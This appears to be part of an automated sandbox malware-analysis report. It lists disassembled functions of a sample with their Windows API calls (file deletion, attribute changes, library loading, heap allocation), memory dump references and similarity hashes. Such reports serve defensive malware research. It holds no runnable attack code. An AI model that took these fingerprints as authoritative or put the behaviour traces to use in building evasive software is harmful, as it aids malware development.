                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0017A27A,?,?,?,0017A113,?,00000001,00000000,?,?), ref: 0017A489
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: 27417fdb65c647df8a4f5ea8bef8a4dde0778f7f3f1d1aa28cc1cbeb0883c258
                  • Instruction ID: 05b931a7f55cccc4e0ccb0f76977d2b97fdcd3774352b838e1cdc112549c7230
                  • Opcode Fuzzy Hash: 27417fdb65c647df8a4f5ea8bef8a4dde0778f7f3f1d1aa28cc1cbeb0883c258
                  • Instruction Fuzzy Hash: BAF01531240209BADB126E60DC45BEA77ACBF05385F48C061BD8C961A1DB769AA8AA50
                  Function 0018D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ItemText_swprintf
                  • String ID:
                  • API String ID: 3011073432-0
                  • Opcode ID: 301e6bbd44ac717bfe7af37d672b47ac7ec3f05572d1f44d596ed02e5df36c73
                  • Instruction ID: f5d44293e4717bc5355997cb01cb5cf45f99127d370be0a96ecf24b2c29d48b5
                  • Opcode Fuzzy Hash: 301e6bbd44ac717bfe7af37d672b47ac7ec3f05572d1f44d596ed02e5df36c73
                  • Instruction Fuzzy Hash: BCF0A0715003486AEB11BBB0AC07FAA3B6CAB14745F040696B604934B2DB716BA08B72
                  Function 0017A12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                  Download Yara Rule
                  APIs
                  • DeleteFileW.KERNELBASE(?,?,?,0017984C,?,?,00179688,?,?,?,?,001A1FA1,000000FF), ref: 0017A13E
                  • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,0017984C,?,?,00179688,?,?,?,?,001A1FA1,000000FF), ref: 0017A16C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: DeleteFile
                  • String ID:
                  • API String ID: 4033686569-0
                  • Opcode ID: cc39b9699758c13bd6bedd85c4f96c5f1a319acf041972baed76fcfa48e01346
                  • Instruction ID: 5a1f16d2df3cdfee0ea0be27bba5051584af0a254bf480896897d62f7ada82a0
                  • Opcode Fuzzy Hash: cc39b9699758c13bd6bedd85c4f96c5f1a319acf041972baed76fcfa48e01346
                  • Instruction Fuzzy Hash: A4E092356402086BEB11AF60DC41FEA77ACBF09381F888065BD88C3060DB719ED4AF90
                  Function 0018A39D Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                  Download Yara Rule
                  APIs
                  • GdiplusShutdown.GDIPLUS(?,?,?,?,001A1FA1,000000FF), ref: 0018A3D1
                  • CoUninitialize.COMBASE(?,?,?,?,001A1FA1,000000FF), ref: 0018A3D6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: GdiplusShutdownUninitialize
                  • String ID:
                  • API String ID: 3856339756-0
                  • Opcode ID: 3ee68c03312fc0514870e4377f664e48e730ebc6739e3822e79d48877c576d40
                  • Instruction ID: 3d1106dd0a1fa2d20310e011679d15038323d4f89b94242171ba174b2aabfe54
                  • Opcode Fuzzy Hash: 3ee68c03312fc0514870e4377f664e48e730ebc6739e3822e79d48877c576d40
                  • Instruction Fuzzy Hash: C5F06D32618655EFCB10EB4CDC45B59FBADFB89B20F04436AF41983B60CB746800CB91
                  Function 0017A194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                  Download Yara Rule
                  APIs
                  • GetFileAttributesW.KERNELBASE(?,?,?,0017A189,?,001776B2,?,?,?,?), ref: 0017A1A5
                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,0017A189,?,001776B2,?,?,?,?), ref: 0017A1D1
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: d99778b8b7b964523c1ec99d8e73e4a08d87ccb405727fa5e8bc891df11e8bd9
                  • Instruction ID: dbd9515db0e893cee20cc11bbdc8e043e3c38c8395b20e324bcb4ed2757d5255
                  • Opcode Fuzzy Hash: d99778b8b7b964523c1ec99d8e73e4a08d87ccb405727fa5e8bc891df11e8bd9
                  • Instruction Fuzzy Hash: 23E092355001285BDB20BB78DC05BD9B7ACAB193E1F4082A1FD58E36A0D7709E849BE0
                  Function 00180085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                  Download Yara Rule
                  APIs
                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001800A0
                  • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0017EB86,Crypt32.dll,00000000,0017EC0A,?,?,0017EBEC,?,?,?), ref: 001800C2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: DirectoryLibraryLoadSystem
                  • String ID:
                  • API String ID: 1175261203-0
                  • Opcode ID: 217f95dad21aad7697d586f3e93fd95444584ba3419782bed026338fb55b60d9
                  • Instruction ID: 6e58a1e6dda46e7f918fc6a3e23a2ee0d1dad916226d7124f5be7837b4c67e84
                  • Opcode Fuzzy Hash: 217f95dad21aad7697d586f3e93fd95444584ba3419782bed026338fb55b60d9
                  • Instruction Fuzzy Hash: 5EE0127690111C6ADB21AAA49C05FD677ACFF1D382F0400A5BA48D3114DB749A84CFA0
                  Function 00189B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                  Download Yara Rule
                  APIs
                  • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00189B30
                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00189B37
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: BitmapCreateFromGdipStream
                  • String ID:
                  • API String ID: 1918208029-0
                  • Opcode ID: d41947c818c70625e9d807496358eec761721fb76f22e5f332217ba7c2df9579
                  • Instruction ID: e27d293c7a502e65f538e74f8f965845ad9fcf4e3f08d69e78ee4cfe8baeafd7
                  • Opcode Fuzzy Hash: d41947c818c70625e9d807496358eec761721fb76f22e5f332217ba7c2df9579
                  • Instruction Fuzzy Hash: 11E0ED71901218EFCB10EF98D901AAAB7E8EB05321F10805BEC9993200E7B16F04AF91
                  Function 0019215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0019329A: try_get_function.LIBVCRUNTIME ref: 001932AF
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0019217A
                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00192185
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                  • String ID:
                  • API String ID: 806969131-0
                  • Opcode ID: b4322acd33906a328d189a5969fb1456a94a720534c2b10d9ae1f58c1d033e3a
                  • Instruction ID: 3f425e9cee2a9ea9a23ce2b2d24883b98ed38a41991dfa062cb595ca781a7516
                  • Opcode Fuzzy Hash: b4322acd33906a328d189a5969fb1456a94a720534c2b10d9ae1f58c1d033e3a
                  • Instruction Fuzzy Hash: 05D0A92824430234AC0827B028560A823886A62BB03E00B66F2308A0D2EF7081646112
                  Function 0018DC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • DloadLock.DELAYIMP ref: 0018DC73
                  • DloadProtectSection.DELAYIMP ref: 0018DC8F
                    • Part of subcall function 0018DE67: DloadObtainSection.DELAYIMP ref: 0018DE77
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: Dload$Section$LockObtainProtect
                  • String ID:
                  • API String ID: 731663317-0
                  • Opcode ID: d575284584e2716ad5a6ed35f11115bbdd484b6fd92653842ba92c5bddc44da9
                  • Instruction ID: 787f86275508e854c669bf9c3c2de2a412cc398c8ff869b50442bf1eba5376d4
                  • Opcode Fuzzy Hash: d575284584e2716ad5a6ed35f11115bbdd484b6fd92653842ba92c5bddc44da9
                  • Instruction Fuzzy Hash: 7CD0C9705153005AC616BB64B98671C33B0B718744F640686E105869E0DFA44EC1DF15
                  Function 001712E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: ItemShowWindow
                  • String ID:
                  • API String ID: 3351165006-0
                  • Opcode ID: 56142e9079f3508922f7a51f4300ed3a1ccce5715c656df72a0fb4dafd30173d
                  • Instruction ID: bed7dec313762c9ce7adf7b790fb73c2d372321855ce3400e1c1329f0739cb7d
                  • Opcode Fuzzy Hash: 56142e9079f3508922f7a51f4300ed3a1ccce5715c656df72a0fb4dafd30173d
                  • Instruction Fuzzy Hash: C2C0123205A201BECB010BB0DC09D2FBBA8ABA5212F05C90AF2B5C0060C238C090DB11
                  Function 001719A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: a6e03feaedd77a054e4772295d365c30c9d8f8b0bf78898bbc810770ff9745d9
                  • Instruction ID: db3acc4739544bd05ea95e1f97abe68290f6c1ab7e9ce9740edbe3b124187900
                  • Opcode Fuzzy Hash: a6e03feaedd77a054e4772295d365c30c9d8f8b0bf78898bbc810770ff9745d9
                  • Instruction Fuzzy Hash: 56C1A770A04254AFDF15CFACC485BA97BB5EF1A310F1880B9EC49DB386DB319944CB61
                  Function 00173B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 813256e6251891bc28c332d40f1d01b237b42cd9044ad3af997bffbe4c887929
                  • Instruction ID: 6607a445ee81ea2a9b4665d7c0b9cee20af454878569afd9ef29a08686a94c2e
                  • Opcode Fuzzy Hash: 813256e6251891bc28c332d40f1d01b237b42cd9044ad3af997bffbe4c887929
                  • Instruction Fuzzy Hash: 0E71AE71104F44AEDB26DB70CC51AEBB7F9AF24301F44895EE5AE47142DB326A48EF50
                  Function 0017837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00178384
                    • Part of subcall function 00171380: __EH_prolog.LIBCMT ref: 00171385
                    • Part of subcall function 00171380: new.LIBCMT ref: 001713FE
                    • Part of subcall function 001719A6: __EH_prolog.LIBCMT ref: 001719AB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 9d643d363294fdc49692b8fe2b7b250d37f4917fca320c197286037987c16b2e
                  • Instruction ID: 50a33761a717995641ffabfc4c8d20d3fb4ccc37eb8b762ad0423c8c90b3c1c5
                  • Opcode Fuzzy Hash: 9d643d363294fdc49692b8fe2b7b250d37f4917fca320c197286037987c16b2e
                  • Instruction Fuzzy Hash: 2D4196719406549ADB24EB60CC59BEA73B8AF60300F0480EAE54EA7092DFB55FC9DF50
                  Function 00171E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 00171E05
                    • Part of subcall function 00173B3D: __EH_prolog.LIBCMT ref: 00173B42
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 5df674569239e92524a3e8bf8887740d98e14f56140863170f8fb7bf8ec32810
                  • Instruction ID: 30c05743dddc57ee1fc20df5164dbe0dcd0fc67097b7310c4778508cf6ca7767
                  • Opcode Fuzzy Hash: 5df674569239e92524a3e8bf8887740d98e14f56140863170f8fb7bf8ec32810
                  • Instruction Fuzzy Hash: CF212872944208AFCF15EFA9D9519EEFBF6FF68300B10446EE849A7251CB325E10CB61
                  Function 0018A7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                  Download Yara Rule
                  APIs
                  • __EH_prolog.LIBCMT ref: 0018A7C8
                    • Part of subcall function 00171380: __EH_prolog.LIBCMT ref: 00171385
                    • Part of subcall function 00171380: new.LIBCMT ref: 001713FE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 86fe7d477c388b09f5912b3ea2843cda27dc5060cb8617ffd2dd591429021863
                  • Instruction ID: 66e6ad6a973d9f7c6a3b6fc40397dfd3ef948cab5db5084a5e5809fea8599405
                  • Opcode Fuzzy Hash: 86fe7d477c388b09f5912b3ea2843cda27dc5060cb8617ffd2dd591429021863
                  • Instruction Fuzzy Hash: 59216D71C04249ABCF14EF98C9415EEBBB4AF2A300F5044AEE809A7242D7356F06DF61
                  Function 001792E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: H_prolog
                  • String ID:
                  • API String ID: 3519838083-0
                  • Opcode ID: 06148a1564420dbfed4efb881be6b76dc1690f2848a11eed7aa4e947bdb16181
                  • Instruction ID: a4f43cb7c00194761c3bbeeb5f5b8b8e925bf838eaf304eb4172fa18e47795e1
                  • Opcode Fuzzy Hash: 06148a1564420dbfed4efb881be6b76dc1690f2848a11eed7aa4e947bdb16181
                  • Instruction Fuzzy Hash: FB115E73A00528ABCB26AAA8CC519EEB736BF98750F058119F819B7291DB358D1487E0
                  Function 0019BB8A Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 001985A9: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00198FD3,00000001,00000364,?,00193713,00000050,?,001B0EE8,00000200), ref: 001985EA
                  • _free.LIBCMT ref: 0019BBF6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AllocateHeap_free
                  • String ID:
                  • API String ID: 614378929-0
                  • Opcode ID: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
                  • Instruction ID: 0e1c97346fbd01b0f6918867d9ad9db8f997bd8646717d7ee4d94e7b7c7be536
                  • Opcode Fuzzy Hash: aa7cfc08f8c271ce16935b528c62ef837d81ae20f42aba82ac1fb9d51323eae8
                  • Instruction Fuzzy Hash: C801F9726043096BEB318F65D88595AFBE9FB95370F25052DE595832C0EB30A805C774
                  Function 001985A9 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00198FD3,00000001,00000364,?,00193713,00000050,?,001B0EE8,00000200), ref: 001985EA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
